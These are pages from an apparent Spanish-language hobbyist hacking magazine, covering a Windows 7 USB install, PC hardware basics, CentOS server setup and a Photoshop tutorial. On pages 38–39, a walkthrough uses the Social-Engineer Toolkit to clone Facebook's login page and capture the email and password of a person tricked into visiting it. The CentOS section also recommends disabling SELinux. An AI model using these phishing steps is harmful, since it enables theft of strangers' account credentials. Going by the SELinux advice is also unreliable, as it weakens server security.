No es dificil lo único que tendremos quetener en cuenta es el hecho de que seránecesario contar con una llave de memoriaUSB con la suficiente capacidad. Laimagen ISO del DVD de Windows 7 Betadebe ser descomprimida en un directoriodentro de la unidad de almacenamiento, porlo que necesitaremos 4 Gbytes de capacidadcomo mínimo. Lo siguiente que tenemosque hacer es comprobar que la BIOS delordenador donde vayamos a realizar lainstalación es compatible con el arranquedesde una unidad USB. Lo cierto es que eslo más probable si el PC cumple con losrequisitos mínimos para instalar Windows7.

Ahora vamos a preparar la llave paraempezar tendremos que preparar la llaveUSB, dándole el formato correcto yactivando la partición que crearemos paraalmacenar luego los contenidos del DVD .Para ello abrimos una consola de comandosescribiendo command en la opción ejecutardel menú inicio y escribiremo uno detrás deotro los siguientes comandos seguidos cadauno de la tecla enter:

1. diskpart2. list disk3. select disk 2 (hay quereemplazar el 2 con el númerode disco en el que se detectenuestra unidad USB)4. clean5. create partition primary6. active7. format fs=fat32 quick8. assign9. exit creamos la partición dearranque en la llave USBCon la imagen ISO de Windows 7 Beta en32 o 64 bits que hemos guardadoanteriormente en el disco duro,simplemente tendremos que hacernos conun programa capaz de extraer todos losficheros de esa imagen ISO. Uno de losmás populares y recomendados esMagicISO.

finalmente tendremos que elegir laimagen del disco de instalación deWindows 7 y descomprimir todos susarchivos a la llave USB. Luegosimplemente introduciremos la llave USBen el ordenador donde queramos instalarWindows 7, estableceremos en la BIOSque arranque desde USB y daremoscomienzo a la instalación.

33

Page 34: Dhackers revista 01

Conociendo mi PC¿Qué es el Hardware?

El hardware se refiere a todos loscomponentes físicos de las computadoras,como loson el disco dura, la grabadora de DVD, laplaca madre, el microprocesador, etc

Software

El software es una secuencia deinstrucciones, las cuales le dicen a loscompones físicoscómo deben realizar una tarea enparticular.Que es un Software de sistema:

Su objetivo es desvincular adecuadamenteal usuario y al programador de los detallesde la computadora en particular que seuse, aislándolo especialmente delprocesamiento referido a las característicasinternas de: memoria, discos, puertos ydispositivos de comunicaciones,impresoras, pantallas, teclados, etc. Elsoftware de sistema le procura al usuario yprogramador adecuadas interfaces de altonivel, herramientas y utilidades de apoyoque permiten su mantenimiento.

Software de programación:

Es el conjunto de herramientas quepermiten al programador desarrollarprogramas informáticos, usando diferentesalternativas y lenguajes de programación,de una manera práctica.

Incluye entre otros:_ Editores de texto_ Compiladores_ Intérpretes

Software de aplicación:

Aquel que permite a los usuarios llevar acabo una o varias tareas específicas, encualquier campo de actividad susceptiblede ser automatizado o asistido, conespecial énfasis en los negocios.

Incluye entre otros:Aplicaciones de Sistema de control yautomatización industrial .._ Aplicaciones ofimáticas_ Software educativo_ Software médico_ Software de Cálculo Numérico_ Software de Diseño Asistido (CAD)_ Software de Control Numérico (CAM)

Datos e Información

En informática decimos que lo queingresamos a la computadora son datos,los mismos son procesados y luego losresultados obtenidos de los datos deentrada los denominaremos información(es decir los datos ya procesados).

Vamos a un ejemplo: Supongamos quedeseamos realizar una suma de dosnúmeros (2+2) con la calculadora que traeel sistema operativo windows, decimosentonces que ingresamos datos ( 2+2) pormedio del teclado, los que al presionar enel botón con el símbolo = para que nosdevuelva el resultado serán procesados porel microprocesador y éste nos responderáen el monitor el resultado que lodenominaremos información (es este casoel número 4).

La presentación de datos seria a si: Las PCo computadoras personales trabajan con labase del sistema de numeraciónb binaria(números 0 y 1).

Unidad central delsistema

Ni más ni menos que la Unidad Centraldel Sistema (System Unit en inglés) es elcentro de operaciones de cualquiercomputadora.Al abrir dicha unidad central del sistema(también denominado gabinete, chasis ocarcasa se pueden visualizar un conjuntode componentes:Nos encontramos con componentescomo:CPU o Unidad central de procesoPlaca madre o motherboardMemoria principalFuente de alimentaciónLos busesDisco duro

Unidad central deproceso:

La unidad centralde proceso (CPU) según la mayoría delos usuarios representa al gabinete ocarcasa de la computadora. CPU enrealidad es el microprocesador el cualtiene como principal objetivo procesarlos datos.Convengamos que unmicroprocesador se puede dividir endos áreas:Área de trabajo Área de Control

34 35SeNeGe

Page 35: Dhackers revista 01

Son la que determinan la velocidad y laeficiencia del procesador. Las áreas deejecución encargada de dar las órdenes alas diversas partes del microprocesador seclasifican en:Unidad Aritmética Lógica y Unidad de puntoFlotanteEncargada de realizar todas las operacionesmatemáticas y lógicas. Maneja operacionesavanzadas de las matemáticas (tales comofunciones trigonométricas y trascendentales)con mayor precisión. Se encarga de verificarque los datos procesados sean correctos.La velocidad de mide en MHz, esto representala cantidad de veces por segundos que elprocesador puede realizar cierto cálculo oproceso. A continuación se presenta unapequeña tabla que ayudará con las unidades demedidas:

1 Hz 1 Hz1 Mhz 1000 Hz1Ghz 1000 MhzSi compramos procesadores de 2 núcleoscomo un microprocesador Intel Core 2 duo(que permite trabajar con 64bits) peronuestro Sistema Operativo (por ejemplo elWindows XP) es de 32Bits nuncaaprovecharemos dicho procesador ya queel mismo trabaría solo a 32bits.

Zócalo del microprocesadorEl zócalo o socket es donde insertamos elmicroprocesador. Está ubicado en la placamadre (detallaremos placa madre en laspróximas unidades)

Temperatura de losprocesadores

Las temperaturas del Procesador idealminima y Temperatura máxima

Sempron 55º 80ºCeleron D 45º 70ºAthlon x2 55º 85ºPentium 4 2Ghz 42º 75ºIntel Core 2 Duo 52º 85º

Factor de formasLas placas madres se puedendiferenciar según sus características,tamaño, etc.Normalmente se clasifican según sufactor de forma (XT, AT, ATX, ATX 2).

Veamos en el gráfico laubicación de cada

componente:

Fuentes de alimentación

Basicamente hablamos de la fuente ..Que cumple funciones básicas como:

_ Rectificar la corriente alterna a corrientecontinua._ Generar los voltajes de corriente continuaVoltajes de la fuente de alimentación:

Las fuentes de alimentación entregandistintos voltajes a los componentesde la PC.

12V (cable amarillo y uno de los de colornegro) se utilizan paraalimentar motores dentro de la PC.Ej. Motor de Disqueteras, motor deDiscos Rígidos, motor de CDROM.

5V (cable rojo y uno de los de colornegro) se utilizan para alimentarcircuitos dentro de la PC.

Ej. Placa lógica de disco duro, placasde expansión, etc.

3,3V o menos se incorporan debido aque las características de diseño de lasnuevas PC, hacen que sus

componentes consuman menos tensiónque antes, Ej. (Microprocesador,memorias, placas de video, etc.)

Gabinetes y tipos:

La carcasa o gabinete de un equipo es elesqueleto metálico (los hay también dealumnio, plástico, acrílico, etc) quecontiene los diferentes componentesinternos de la PC.

Mini Tower (son pequeños y utilizados enespacios reducidos).

Médium Tower (es el más utilizado en laactualidad).

Full Tower (es el más grande, usadonormalmente para servidores).

Slim Tower (similar al minitower peromás delgado).

35

Page 36: Dhackers revista 01

Desktop (gabinete dispuesto en formahorizontal) tiene como particularidad laposibilidad se apoyar encima de éste elmonitor reduciendo espacio.

Ventilación del gabineteEl gabinete tiene entre sus funciones crearuna corriente de aire interna para refrigerarlos distintos componentes internos.Puede haber más de un cooler o ventiladorinterno. Además suele haber modelos degabinetes donde una de sus tapas lateralescontiene un cooler.

A continuación la imagen:

Medidas actuales de diversos dispositivosde AlmacenamientoDispositivo Capacidad

Disco Duro 160Gb – 250Gb – 320Gb –500Gb – 750GB – 1000GbDisquete 1,44 MbCD 700MbDVD 4,7GbCinta magnética 40Gb – 80GbPendrive 1Gb – 2Gb – 4Gb – 8Gb – 16Gb– 32GbMemoria SD y micro SD 1Gb – 2Gb – 4Gb– 8GbBlu­ray 25Gb – 50Gb

Funcionamiento deldisco duro

Los cabezales se desplazansincronizadamente y se introducen comoun peine dentro de los espacios vacíos olibres entre los discos que están girando.Es importante aclarar que cuando hablamosdel disco duro siempre nos imaginamos unsolo disco o plato interno girando.

La distancia entre cabezal y superficie dedisco es aproximadamente a una centésimaparte del promedio de un cabello humano.

Tipos de discos durossegún tecnología

IDE (Integrated Drive Electronics) es unadenominación comercial, ya que ladenominación técnica para estos discosduros es ATA (Conexión AT), deriva deldiseño original, el cual era conectar unacombinación de unidad y controlador al busde una computadora AT.

La ventaja delcable de 80 hilos que al tener hilos a masadisminuye las interferencias eléctricas quepueden producir los hilos de tensión.

En la siguiente imagen podemosvisualizar el cable de datos (o bus dedatos) y el cable de alimentación que vanconectados al disco duro ATA.

diferencia de los discos ATA (IDE), losdiscos SATA no se configuran, ya que elbus de datos de la placa del disco durosolo permite una sola unidad por conector.

Una de las ventajas es la velocidad si lacomparamos con los discos ATA (hasta133Mb/s) en este caso los discos SATAtienen una tasa de transferencia de unos300Mb/s.

Pendrive

Es un dispositivo de almacenamiento queutiliza la memoria flash para almacenar lainformación sin necesidad de pilas obaterías.Es importante a la hora de quitar eldispositivo del puerto USB, previamentedesde el Windows realicemos la siguientetarea:

Nos ubicamos en la barra de tareas(normalmente está abajo del escritorio dewindows) y desde el ícono que aparece enla esquina inferior derecha de la barraantes mencionada (al lado de la hora de laPC)

36\ 37\

Page 37: Dhackers revista 01

Hacemos doble clic y luego seleccionamosdonde dice Dispositivo de almacenamientomasivo USB y presionamos en el botónllamado Detener.

Visualizaremos una ventana en la cuálmarcaremos el dispositivo adesconectar (en este caso un pendrivemarca CORSAIR y luego presionamosen Aceptar.

Una vez respetado estos pasos podemosquitar con seguridad nuestro pendrive.

Tipos de periféricos

Periféricos de entrada_ Periféricos de salida_ Periféricos de entrada/salida_ Periféricos de almacenamiento_ Periféricos de comunicacióPeriféricos de entrada son los que permiteningresar datos externos nuestracomputadora. Algunos de estos periféricosson: teclado, micrófono, webcam, escáner,Mouse y otros.

Periféricos de salida son los que recibenla información de la CPU y la muestranalusuario. Ejemplos: monitor, parlantes,impresoras.Periféricos de entrada/salida son el casotípico de las impresoras multifunción (lasmismas tienen la posibilidad de escaneare imprimir)Periféricos de almacenamiento sonaquellos encargados de almacenar losdatos.Ejemplos: disco duro, cd, dvd, pendrive.Periféricos de comunicación permiten elvínculo entre computadoras o entre la PCy otros periféricos. Ejemplos:fax/modem, hub, switch, router, placa dered, placa madre.

MonitoresCRT (tubo de rayos catódicos)

Resoluciones aconsejables de losmonitoreTamaño de monitor Cantidad de píxeles14” 640 x 48015” 800 x 60017” 1024 x 76819” 1280 x 102420” 1600 x 128021”1600x1280LCD (Display o pantalla de cristal

líquido)Un punto a tener en cuenta a la hora deelegir un monitor es la entrada de datos,hay monitores que traen incorporados elconector VGA y el DVI.Un punto a teneren cuenta a la hora de elegir un monitores la entrada de datos, hay monitores quetraen incorporados el conector VGA y elDVI.Un punto a tener en cuenta a la horade elegir un monitor es la entrada dedatos, hay monitores que traenincorporados el conector VGA y el DV

37\

Page 38: Dhackers revista 01

Iniciamos nuestro backtrackAhora iniciamos The Social­Engineer Toolkit(SET)…

Nos mandara un pantalla:

Nos dice que la herramienta no se use con finesmalintencionados sino de prueba, le damos Y yENTER

Elegimos la opción 1 y enter

Luego la opción 3 y enter

Luego la opción 2 y enter

Despues la opción 2 y enter

Luego la opción 3 y enter

Luego la opción 2 y enter

Obtener contraseña de

38 39arthusu

Page 39: Dhackers revista 01

Ponemos la url que queremos clonar el sitio en estecaso facebook XD! (la url tiene que llevar http :D )Luego enter y enter y esta escuchando en el puerto80 los que entren capturando las pass.

Ponemos ifconfig para ver nuestra ip ahora cuando

entremos desde otra pc a esa ip…

Ahora se la pasamos a alguien… con un poco deing. Social

El mete su correo y contraseña

Por eso hay que fijarse en la url

El se logea y nos sale su correo y pass

El se logea y nos sale su correo y pass...39

Page 40: Dhackers revista 01

INTRODUCCION# IMPORTANE: en todo momento SI TIENES UNA VERSIONmenor a 6 de CentOS, puedes considerar seguir el manualsiempre y cuando en la parte de "REPOS" instales los sitoriosque vayan para tu version.

En este manual practico aprenderas como instalar un servidorGNU/Linux basado en la distribucion CentOS, he utilizado laversion actual mas nueva (CentOS 6), asumiendo que yatenemos instalado CentOS aprenderas sobre todos los serviciosque debe contar un servidor, la instalacion y configuracionbasica de los servicios.

Estas implementaciones son recomendadas 100% paraservidores dedicados (en la nube), pero debes tomar en cuentaque en todo momento pueden servirte tambien para un servidorlocal.

TIPOS DE SERVICIOS

HOSTINGGeneralmente cuando tienes un primer acercamiento aservidores y pretender levantar un sitio web con contenidobasico y servicios muy comunes (face connect, blog, comments,etc...) lo mas sencillo es contratar un servidior de Hosting endonde el proveedor de Hosting te proporciona una cantidadlimitada o especifica de espacio en disco duro paraalmacenamiento de datos, acceso a servicios externos necesarioscomo: MySQL, Postfix (servidor de correo) y DNS (para eldominio).

En un Servicio de Hosting existen limitaciones muy marcadascomo:

­ Tienes un espacio limitado en disco duro para almacenamientode datos.­ El servicio de Base de Datos MySQL es limitado a ciertonumero de bases creadas y peso en consumo total.­ El servidor Postfix (SMTP) esta limitado a un numero decorreos de salida diarios.­ El ancho de banda es limitado a cierto consumo.­ No tienes acceso a un DNS, solo a establecer tu propiodominio.­ Existe una limitacion en la creacion de sub­dominios.­ El servidro FTP te limita a cierto numero de cuentas.­ No puedes requerir mas servicios, mas los que ya se

mencionaron.

Pero una vez que crece mas tu pagina y pasa de ser a paginacomun (o blog) a una plataforma de sevicios, es cuando enrealidad vez la gran necesidad de mejor adquirir un servidordebido a las grandes limitaciones de un servico de Hosting.

La alternativa a un Hosting, seria la contratacion de un ServidorDedicado o Servidor Dedicado Virtual.

DEDICADOSLos servidores dedicados se dividen en dos, los servidoresdedicados normales y dedicados virtuales:

Un Servidor Dedicado Virtual es basicamente una maquinavirtual (VirtualBox, VMWare o Xen) que corre en un servidorfisico real,el unico detalle es que si tu proveedor tiene 10 virtuales corriendo,entonces toda la RAM es compartida entre los 10 virtuales. Yentre otras limitaciones:

­ No puedes crear mas virtuales dentro de tu virtual.­ El ancho de banda es compartido.­ Si la maquina virtual tiene limitaciones, entonces tu sistemaoperativo las hereda.­ Si tu proveedor tiene una sola tarjeta de red, entonces todos losvirtuales pasan por la misma interface.

En un Servidor Dedicado normal, basicamente se te estaarrendando un equipo de computo fisico completo, gozando detodos los servicios como si tuvieses la maquina puesta en tupropia casa o negocio.

Las ventajas son muy amplias:

­ Puedes instalar cualquier servicio (FTP, Apache, Bind, MySQL,Asterisk, Icecast, Virtuales, VNC, SSH, etc..).­ Tienes acceso a una consola para manejar tu equipo,

Las limitaciones:

­ Tu te encargas de tu seguridad.­ Tu configuras todo.­ Tu te encragas de respaldar.­ Debes tener amplios conocimientos.

Es recomendable un servidor dedicado cuando tus exigencias y

LEVANTANDO EL HYPER

40 41ANGEL

Page 41: Dhackers revista 01

necesidades sobre pasan a un servicio de hosting comun :D.

INTERFACESSi tenemos una o varios IPs estaticas pero solo contamos con unasola tarjeta de red, lo mas correcto seria configurar hebras de lamisma configuracion donde solo vamos poniendo las demas IPsasociando estas nuevas IPs con un valor de ethX compartido.

shell# cd /etc/sysconfig/network­scripts/# ip estatica 1 ­­ eth0shell# cat ifcfg­eth0DEVICE=eth0BOOTPROTO=noneONBOOT=yesIPADDR=10.10.10.1NETMASK=255.255.255.0GATEWAY=10.10.10.254TYPE=EthernetHWADDR=aa:bb:cc:dd:ee:ff# ip estatica 2 ­­ eth0:0shell# cat ifcfg­eth0:0DEVICE=eth0:0BOOTPROTO=noneONBOOT=yesIPADDR=10.10.10.2NETMASK=255.255.255.0GATEWAY=10.10.10.254TYPE=EthernetHWADDR=aa:bb:cc:dd:ee:ff# ip estatica 3 ­­ eth0:1shell# cat ifcfg­eth0:1DEVICE=eth0:1BOOTPROTO=noneONBOOT=yesIPADDR=10.10.10.3NETMASK=255.255.255.0GATEWAY=10.10.10.254TYPE=EthernetHWADDR=aa:bb:cc:dd:ee:ff# reiniciar para cargar cambiosshell# /etc/init.d/network restart# ver las interfacesshell# ifconfig ­a

DESHABILITAR SELINUXEl SELinux es un firewall integrado en CentOS que mas que ayudar,siempre ya un monton de problemas, lo mas recomendable esmontarnos nuestras propias reglas de firewall y no depende de laautomatizacion, ya que SELinux es tan delicado, que por el simpleecho de hacerle PING al server, nos bannea el IP y no podemosconectarnos de ninguna forma.

# deshabilitando selinusshell# system­config­securitylevel­tui

Security Level: ( ) Enables (*) Disables

SELinux: "Disables"Damos Ok y hay que reiniciar: shell# reUPDATE CENTOS

Ya configurado todo, debemos rehacer update:

# importamos llaves de servidores defaultshell# rpm ­­import /etc/pki/rpm­gpg/RPM­GPG­KEY­*shell# yum update ­yREPOSEs bueno tener otros Repositorios habilitados ya que comunmentelos repos por default no tienen muchos mas archivos que suelen sernecesarios a la hora de quere otras aplicaciones o implementacionesde seguridad en nuestro server:

# paquete necesarioshell# yum install ­y rpm­libsshell# yum install ­y yum­utils# reposshell# cd /etc/pki/rpm­gpg/shell# wget http://apt.sw.be/RPM­GPG­KEY.dag.txtshell# rpm ­­import RPM­GPG­KEY.dag.txtshell# wget http://dl.fedoraproject.org/pub/epel/6/i386/epel­release­6­5.noarch.rpmshell# rpm ­­import epel­release­6­5.noarch.rpmshell# wget http://rpms.famillecollet.com/RPM­GPG­KEY­remishell# rpm ­­import RPM­GPG­KEY­remishell# wget http://ATrpms.net/RPM­GPG­KEY.atrpmsshell# rpm ­­import RPM­GPG­KEY.atrpms# editar EPEL y agregar una lineashell# cd /etc/yum.repos.d/shell# cat epel.repo[epel]...priority=10...# repo RPMForge para Cento5shell# wgethttp://apt.sw.be/redhat/el5/en/i386/rpmforge/RPMS/rpmforge­release*rpmshell# rpm ­Uvh rpmforge­release*rpm# repo ATRpmsshellt# wgethttp://dl.atrpms.net/el5­x86_64/atrpms/stable/atrpms­repo*rpmshell# rpm ­Uvh atrpms­repo*rpm# actualizacionshell# yum install ­y yum­prioritiesshell# yum update ­y

PAQUETES BASETodo sistema GNU/Linux siempre usa un conjunto de paquetes quese requiere en todoas partes y por cualquier software independiente,te recomiendo instales estos paquetes como base (los primer queinstales en tu server):

shell# yum install ­y fetchmail wget bzip2 unzip zip nmap openssllynx fileutils gcc gcc­c++

continuara...

41

Page 42: Dhackers revista 01

FOTOMONTAJEHola compañeros les vengoa dejar este gran tutorialde como crear unfotomontaje usando 2animales distintos yobteniendo un granresultado espero yaprendan bueno empezamos.Primero que nada abrimoslas 2 imágenes como semuestra en la siguienteimagen Yo utilizareEstas 2 imágenes

Ya abierta la primera imagen utilizaremos

la herramienta de lazo magnético

Ie seleccionamos toda la cabeza del águiladetalladamente ya teniendo eso listo damos

enterPara validar la selección nos debe de

quedar algo así..Ya seleccionada la cabezadel águila la arrastramos ala siguiente imagen“pescado” y le damos Ctrl+ty seleccionamos voltiarhorizontalmente

Ie acomodamos la cabeza delaguila como en la siguiente

42 43m3x1c0h4ck

Page 43: Dhackers revista 01

imagen.Le bajamos la opacidad i conla herramienta borradorborramos esas partes que

sobran para dejarla igual quela cabeza del pez. Algo asíAhora ocultamos la capa deláguila i hacemos unaselección con la herramienta

lazo magnético.Luego de eso duplicamos esacapa presionando ctrl+jI la capa duplicada la

pasamos encima del águila nosquedaría así,La primera capa le damos encrear mascara de recorte

presionando ctrl+alt+gI la poner en modo oscureceri nos quedaría asi.

Ahora para finalizar damosctrl+t i en deformar i ladeformamos i nos quedaría asi

Este es el resultado final

43